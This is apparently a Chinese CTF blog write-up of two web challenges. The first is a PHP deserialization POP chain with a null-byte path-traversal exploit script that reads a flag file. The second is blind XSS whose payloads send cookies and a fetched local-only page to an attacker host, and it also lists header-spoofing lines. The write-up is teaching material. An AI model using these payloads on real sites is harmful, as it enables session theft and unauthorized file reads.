<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">abaaba</span></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$DoNotGet</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;DoNotGet-&gt;<span class="variable">$name</span> = <span class="string">&quot;two&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;DoNotGet-&gt;<span class="variable">$name</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Onemore</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">readfile</span>(<span class="string">&quot;images/def.jpg&quot;</span>);</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;file=<span class="string">&quot;images/def.jpg&quot;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readfile</span>(<span class="params"><span class="variable">$f</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;file = <span class="keyword">isset</span>(<span class="variable">$f</span>) ? <span class="variable">$f</span> : <span class="string">&#x27;image&#x27;</span>.<span class="variable language_">$this</span>-&gt;file;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="title function_ invoke__">safe</span>(<span class="variable">$this</span>-&gt;file));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;filename-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">suhasuha</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$Giveme</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$action</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;Giveme = (<span class="variable language_">$this</span>-&gt;action)();</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">One</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$count</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;count = <span class="string">&quot;one&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;try &quot;</span>.<span class="variable language_">$this</span>-&gt;count.<span class="string">&quot; again&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe</span>(<span class="params"><span class="variable">$path</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$path</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/.*\/\/.*/&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$path</span>);</span><br><span class="line">    <span class="variable">$path</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/\..\..*/&quot;</span>, <span class="string">&quot;!&quot;</span>, <span class="variable">$path</span>);</span><br><span class="line">    <span class="variable">$path</span> = <span class="title function_ invoke__">htmlentities</span>(<span class="variable">$path</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">strip_tags</span>(<span class="variable">$path</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;game&#x27;</span>]))&#123;</span><br><span class="line">    <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;game&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我是从下往上看的首先就看到了One这个类的destruct进行了字符串拼接，很明显就能想象到会调用__tostring函数,所以查找tostring发现类abaaba存在tostring，所以我们把$this-&gt;count 指向abaaba的对应对象上既可以进入abaaba。</p>
<p>然后abaaba类的tostring调用了一个不存在的属性(Giveme)：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">abaaba</span></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$DoNotGet</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;DoNotGet-&gt;<span class="variable">$name</span> = <span class="string">&quot;two&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;DoNotGet-&gt;<span class="variable">$name</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;-</span><br></pre></td></tr></table></figure>

<p>调用不存在的属性时会调用__get魔术方法从而进行对$this-&gt;DoNotGet-&gt;$name的设置。而设置一个不存在的属性会调用魔术方法set，所以我们就关注下 类suhasuha：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">suhasuha</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$Giveme</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$action</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;Giveme = (<span class="variable language_">$this</span>-&gt;action)();</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>suhasuha的set方法正好触发危险函数可以调用一个无参构造方法，所以我们可以将这个方法设为类Onemore的readfile，尽管readfile有参数，但是无参也是可以执行的 会走到image拼接路径那一步：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Onemore</span></span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">readfile</span>(<span class="string">&quot;images/def.jpg&quot;</span>);</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;file=<span class="string">&quot;images/def.jpg&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readfile</span>(<span class="params"><span class="variable">$f</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;file = <span class="keyword">isset</span>(<span class="variable">$f</span>) ? <span class="variable">$f</span> : <span class="string">&#x27;image&#x27;</span>.<span class="variable language_">$this</span>-&gt;file;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="title function_ invoke__">safe</span>(<span class="variable">$this</span>-&gt;file));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;filename-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如何制定action调用类的指定方法呢？</p>
<p>用数组：$this-&gt;action&#x3D;array(new Onemore(),”readfile”);</p>
<p>然后我们设定Onemore类中的file参数就能进行任意目录文件读取，但是safe中过滤了一些参数，好像是不能饶过，但是可以通过00饶过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$Onemore</span>-&gt;file = <span class="string">&quot;..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/..\x00/flag&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>我们的思路整理完了，但是如果我们直接生成对象并根据思路进行赋值时会发现报错：</p>
<p>类abaaba的DoNotGet属性时protected的，是无法外部赋值的，对于这种私有和保护的属性进行处理时，如果他不是序列化中必须的参数，可以直接删除，如果必须要用到且是无法外部调用的，那么我们就可以使用__construct构造函数进行内部赋值，也就是说可以直接在new对象的时候就完成属性赋值。</p>
<p>最终的payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">abaaba</span></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$DoNotGet</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$name</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;DoNotGet-&gt;<span class="variable">$name</span> = <span class="string">&quot;two&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;DoNotGet-&gt;<span class="variable">$name</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    	<span class="variable">$suhasuha</span> = <span class="keyword">new</span> <span class="title function_ invoke__">suhasuha</span>();</span><br><span class="line">    	<span class="variable">$Onemore</span> = <span class="keyword">new</span> <span class="title class_">Onemore</span>();</span><br><span class="line">    	<span class="variable">$Onemore</span>-&gt;file = <span class="string">&quot;..\x00/..\x00/flag.php&quot;</span>;</span><br><span class="line">    	<span class="variable">$suhasuha</span>-&gt;action = <span class="keyword">array</span>(<span class="variable">$Onemore</span>,<span class="string">&quot;readfile&quot;</span>);</span><br><span class="line">    	<span class="variable language_">$this</span>-&gt;DoNotGet = <span class="variable">$suhasuha</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Onemore</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">    <span class="comment"># private 修改</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">readfile</span>(<span class="string">&quot;images/def.jpg&quot;</span>);</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;file=<span class="string">&quot;images/def.jpg&quot;</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readfile</span>(<span class="params"><span class="variable">$f</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;file = <span class="keyword">isset</span>(<span class="variable">$f</span>) ? <span class="variable">$f</span> : <span class="string">&#x27;image&#x27;</span>.<span class="variable language_">$this</span>-&gt;file;</span><br><span class="line">        <span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="title function_ invoke__">safe</span>(<span class="variable">$this</span>-&gt;file));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__invoke</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;filename-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">suhasuha</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$Giveme</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$action</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$value</span></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;Giveme = (<span class="variable language_">$this</span>-&gt;action)();</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;Giveme;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">One</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$count</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;count = <span class="string">&quot;one&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;try &quot;</span>.<span class="variable language_">$this</span>-&gt;count.<span class="string">&quot; again&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe</span>(<span class="params"><span class="variable">$path</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$path</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/.*\/\/.*/&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$path</span>);</span><br><span class="line">    <span class="variable">$path</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&quot;/\..\..*/&quot;</span>, <span class="string">&quot;!&quot;</span>, <span class="variable">$path</span>);</span><br><span class="line">    <span class="variable">$path</span> = <span class="title function_ invoke__">htmlentities</span>(<span class="variable">$path</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">strip_tags</span>(<span class="variable">$path</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;game&#x27;</span>]))&#123;</span><br><span class="line">    <span class="title function_ invoke__">unserialize</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;game&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$one</span> = <span class="keyword">new</span> <span class="title class_">One</span>();</span><br><span class="line"><span class="variable">$abaaba</span> = <span class="keyword">new</span> <span class="title function_ invoke__">abaaba</span>();</span><br><span class="line"><span class="variable">$one</span>-&gt;count = <span class="variable">$abaaba</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;-------------------------&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$one</span>));</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="xss盲打和本地请求伪造"><a href="#xss盲打和本地请求伪造" class="headerlink" title="xss盲打和本地请求伪造"></a>xss盲打和本地请求伪造</h3><p>这道题目其实挺简单的先xss打cookie,我这里使用的是如下payload(这个不唯一)：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">  <span class="variable language_">document</span>.<span class="property">location</span>=<span class="string">&quot;http://xxxx.xxx.com/cookie.php?c=&quot;</span>%2bdocument.<span class="property">cookie</span>;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>得到提示：GET &#x2F;a?cookie&#x3D;hint&#x3D;Visit%20&#x2F;g3t_fl4g%20to%20get%20flag HTTP&#x2F;1.1</p>
<p>我们直接访问&#x2F;g3t_fl4g提示本地访问，一般来说我们的这个伪造本地header中只有以下几种方法：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">X-Originating-IP</span><span class="punctuation">: </span>127.0.0.1</span><br><span class="line"><span class="attribute">X-Forwarded-For</span><span class="punctuation">: </span>127.0.0.1</span><br><span class="line"><span class="attribute">X-Remote-IP</span><span class="punctuation">: </span>127.0.0.1</span><br><span class="line"><span class="attribute">X-Remote-Addr</span><span class="punctuation">: </span>127.0.0.1</span><br><span class="line"><span class="attribute">Client-IP</span><span class="punctuation">: </span>127.0.0.1</span><br></pre></td></tr></table></figure>

<p>但是这里都不行，再结合xss可以想到是利用xss伪造管理员本地发一个请求，再把响应携带出来，很容易就想到用AJAX。</p>
<p>但是这里对XMLHttpRequest有过滤，我们只需要简单的饶过一下即可：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">    <span class="keyword">var</span> ajx = <span class="built_in">eval</span>(<span class="string">&quot;new XMLH&quot;</span>+<span class="string">&quot;ttpR&quot;</span>+<span class="string">&quot;equest&quot;</span>);<span class="comment">//拼接绕过。</span></span><br><span class="line">    ajx.<span class="title function_">open</span>(<span class="string">&quot;GET&quot;</span>,<span class="string">&quot;/g3t_fl4g&quot;</span>,<span class="literal">true</span>);</span><br><span class="line">    ajx.<span class="title function_">send</span>();</span><br><span class="line">    ajx.<span class="property">onreadystatechange</span> = <span class="keyword">function</span> (<span class="params"></span>) &#123;</span><br><span class="line">        <span class="keyword">if</span>(ajx.<span class="property">readyState</span> === <span class="number">4</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span>(ajx.<span class="property">status</span> == <span class="number">200</span>) &#123;</span><br><span class="line">                ajx.<span class="title function_">open</span>(<span class="string">&quot;GET&quot;</span>,<span class="string">&quot;http://VPS:5555/?flag=&quot;</span> + ajx.<span class="property">responseText</span>,<span class="literal">true</span>);</span><br><span class="line">                ajx.<span class="title function_">send</span>();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>我们的vps上面就会收到flag了。</p>
<h2 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h2><p>web狗真是没啥出路，卷不动CTF了。</p>

    </div>

    
    
    


<span style="margin-top:30px; color:var(--blockquote-color); font-size:0.85em">
        <br>
        <span class="post-end-item" title="copyright"">
            <span class="post-end-item-icon" style="margin-right: 3px">
                <i class="fab fa-fw fa-creative-commons"></i>
            </span>
            <span class="post-end-item-text">采用署名-非商业性使用-相同方式共享 4.0（CC BY-NC-SA 4.0）许可协议</span>
        </span>
</span>





<div class="donations">
    <div class="donation-label">「分享也是一种学习」</div>
</div>

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/overview/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/shiro%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%AF%86%E9%92%A5%E8%AF%AF%E5%88%A4%E6%96%AD%E9%97%AE%E9%A2%98/" rel="prev" title="shiro漏洞的密钥误判断问题">
      <i class="fa fa-chevron-left"></i> shiro漏洞的密钥误判断问题
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/CFS%E4%B8%89%E5%B1%82%E9%9D%B6%E5%9C%BA%E7%9A%84%E7%A9%BF%E9%80%8F%E5%AE%9E%E8%B7%B5/" rel="next" title="CFS三层靶场的穿透实践">
      CFS三层靶场的穿透实践 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
